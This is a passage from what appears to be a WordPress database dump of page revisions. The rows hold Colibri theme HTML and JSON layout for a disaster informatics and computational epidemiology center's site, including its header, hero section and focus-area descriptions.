</div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c26\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c26 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c28-outer\">\n            <div data-colibri-id=\"20-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c29\" class=\"h-global-transition-all h-heading style-334 style-local-20-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-334 style-local-20-c29\">\n                    <!---->\n                    <!---->\n                    <h1 class=\"\">Focus Areas</h1>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c6\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n          <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c10\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n        <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c14\">\n                <!---->\n                <!---->\n                <h5 class=\"\">Impact assessment</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 18:36:59','2022-02-16 18:36:59','',20,'https://gsudice.dataconn.net/?p=410',0,'revision','',0),(411,1,'2022-02-16 18:36:59','2022-02-16 18:36:59','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 18:36:59','2022-02-16 18:36:59','',23,'https://gsudice.dataconn.net/?p=411',0,'revision','',0),(412,1,'2022-02-16 18:36:59','2022-02-16 18:36:59','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div 